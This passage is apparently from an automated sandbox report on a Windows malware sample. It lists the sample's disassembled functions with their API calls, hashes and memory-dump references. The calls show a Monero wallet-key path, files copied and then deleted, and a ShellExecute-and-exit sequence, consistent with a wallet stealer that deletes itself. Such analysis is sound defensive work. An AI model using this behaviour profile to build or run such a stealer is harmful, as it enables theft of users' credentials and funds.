                                  • Opcode ID: bfaf0fceeb610086905acd2185fa5cf4aae8aaf000c9c76d065a6e175a3d4694
                                  • Instruction ID: 41a1a7dfbf2be15bfd839ff604516e779f086f304d08aaad064605521d19485f
                                  • Opcode Fuzzy Hash: bfaf0fceeb610086905acd2185fa5cf4aae8aaf000c9c76d065a6e175a3d4694
                                  • Instruction Fuzzy Hash: 931191B1A48305EBD710CF94EC4AFBFBBB8FB44711F10451AFA85A7684DB7958048BA0
                                  Function 00E59260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • StrStrA.SHLWAPI(01CBE9C0,?,?,?,00E5140C,?,01CBE9C0,00000000), ref: 00E5926C
                                  • lstrcpyn.KERNEL32(0108AB88,01CBE9C0,01CBE9C0,?,00E5140C,?,01CBE9C0), ref: 00E59290
                                  • lstrlen.KERNEL32(?,?,00E5140C,?,01CBE9C0), ref: 00E592A7
                                  • wsprintfA.USER32 ref: 00E592C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: afb2d5653d859957336ec504cc335e2ec66dfc0422276012353bce08511d2fa1
                                  • Instruction ID: 3d9a5601ff394e27cb474bc58962898c7b36ecda4ead0c157d941a7dcca12e7d
                                  • Opcode Fuzzy Hash: afb2d5653d859957336ec504cc335e2ec66dfc0422276012353bce08511d2fa1
                                  • Instruction Fuzzy Hash: 86015E75604208FFCB04DFECD984EAE3BB9FB48394F108549F9899B605C639EA40DB90
                                  Function 00E412A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E412B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E412BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E412D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E412F5
                                  • RegCloseKey.ADVAPI32(?), ref: 00E412FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: d67ec1ff8067b30939fe146f49f2f7f707ee3d42b494526b188e5ede2501f883
                                  • Instruction ID: 4431d4f6c9a8bd58587c8c7f514e0e311e0b62bfb1dec0fd1cb4f908102327ed
                                  • Opcode Fuzzy Hash: d67ec1ff8067b30939fe146f49f2f7f707ee3d42b494526b188e5ede2501f883
                                  • Instruction Fuzzy Hash: 050112B5A44208FBDB10DFD0DC49FAEB7B8EB48701F008155FA4597284D6759A019B60
                                  Function 00E56630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00E56663
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E56726
                                  • ExitProcess.KERNEL32 ref: 00E56755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: a8d41d2cd9e8edaa118a6b7222fe5ab97be52b4b15adfce404c0fca31395892d
                                  • Instruction ID: 8d272f8c67e5789e26acbed0d7899c3ffd9eeb301e63cc5e945c40dfef9571fd
                                  • Opcode Fuzzy Hash: a8d41d2cd9e8edaa118a6b7222fe5ab97be52b4b15adfce404c0fca31395892d
                                  • Instruction Fuzzy Hash: A9316BB1901218AADB14EB90DC86BDEB7B8AF48300F405599F60A77181DF786B48CF69
                                  Function 00E587C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E60E28,00000000,?), ref: 00E5882F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E58836
                                  • wsprintfA.USER32 ref: 00E58850
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: b66c43d5e6078ffb0dfd80f608643e3c50a214dae30c4efa01cb87516fc93cd3
                                  • Instruction ID: bbab36b1747f5452ce0f92dec43650116476a9bc6f0c8d75ce310777e6108420
                                  • Opcode Fuzzy Hash: b66c43d5e6078ffb0dfd80f608643e3c50a214dae30c4efa01cb87516fc93cd3
                                  • Instruction Fuzzy Hash: 7C215EB1A44204EFDB14DFD4DD45FAEBBB8FB48711F10451AFA45B7684C77A99008BA0
                                  Function 00E58D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E5951E,00000000), ref: 00E58D5B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E58D62
                                  • wsprintfW.USER32 ref: 00E58D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 939f9fb30a0431674d42ba01c3b0ce90e165ad951cf457275001f9e2ad99df1a
                                  • Instruction ID: 8bf5cb868578de4fefb89810d25cdd8aae5241c3e8d43dbf4d6b8b1ffe596591
                                  • Opcode Fuzzy Hash: 939f9fb30a0431674d42ba01c3b0ce90e165ad951cf457275001f9e2ad99df1a
                                  • Instruction Fuzzy Hash: 56E08CB0B54208FBC720DB94EC0AE6D77B8EB04702F000095FE8A97680DA769E009BA1
                                  Function 00E4A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E58B60: GetSystemTime.KERNEL32(00E60E1A,01CBAD00,00E605AE,?,?,00E413F9,?,0000001A,00E60E1A,00000000,?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E58B86
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4A2E1
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 00E4A3FF
                                  • lstrlen.KERNEL32(00000000), ref: 00E4A6BC
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E4A743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 0fc9c53ec23262ab87555852a262843b4c97ca3389d7f834b8ec9af27305fe04
                                  • Instruction ID: df943d582f266519c2e6a7b5ff0c4055f468df8f29df2d99164cd4cf3544306e
                                  • Opcode Fuzzy Hash: 0fc9c53ec23262ab87555852a262843b4c97ca3389d7f834b8ec9af27305fe04
                                  • Instruction Fuzzy Hash: 6EE111728101189ACB18FBA4DC96EEE7378BF54301F549A79F91772091EF346A0DCB62
                                  Function 00E4D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E58B60: GetSystemTime.KERNEL32(00E60E1A,01CBAD00,00E605AE,?,?,00E413F9,?,0000001A,00E60E1A,00000000,?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E58B86
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4D481
                                  • lstrlen.KERNEL32(00000000), ref: 00E4D698
                                  • lstrlen.KERNEL32(00000000), ref: 00E4D6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E4D72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 1c68581d237b2873806fb11dc7f215ce0481ae8ae92e1dad1fb382049cf3b3cc
                                  • Instruction ID: 66249ccc20d31213f75660a875c5d564d153bf40c1a4a8943da126b6bd571920
                                  • Opcode Fuzzy Hash: 1c68581d237b2873806fb11dc7f215ce0481ae8ae92e1dad1fb382049cf3b3cc
                                  • Instruction Fuzzy Hash: EC911E729101189ACB18FBA0DC96DEE7378BF54301F545A79F947B2092EF346A0DCB62
                                  Function 00E4D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E58B60: GetSystemTime.KERNEL32(00E60E1A,01CBAD00,00E605AE,?,?,00E413F9,?,0000001A,00E60E1A,00000000,?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E58B86
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4D801
                                  • lstrlen.KERNEL32(00000000), ref: 00E4D99F
                                  • lstrlen.KERNEL32(00000000), ref: 00E4D9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E4DA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 815199c9915c212e244cfe8b7d4909bc5ec48dd61810f4db2a794f6954f5deb7
                                  • Instruction ID: 6691eaecc4969c37c99ded2a1c4a2b1eacb97e38e64fbc0f5b2f41e814f2f0c0
                                  • Opcode Fuzzy Hash: 815199c9915c212e244cfe8b7d4909bc5ec48dd61810f4db2a794f6954f5deb7
                                  • Instruction Fuzzy Hash: 48811E729101189ACB18FBA4DC96DEE7378BF54301F445A39F947B6092EF346A0DCB62
                                  Function 00E53560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: c6f262f21a4423362b82930a0a7e59d874ca06f8d3f594463b95cdf02ed8317a
                                  • Instruction ID: eb21cdafa620a69b49b3cd3d8fe75b77106f5d72d158f4ef844732318c5fa922
                                  • Opcode Fuzzy Hash: c6f262f21a4423362b82930a0a7e59d874ca06f8d3f594463b95cdf02ed8317a
                                  • Instruction Fuzzy Hash: 7E416171D10208EFCB04EFB4D845AEEB7B4BF44345F049929E91677281DB759A09CFA2
                                  Function 00E49CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E499EC
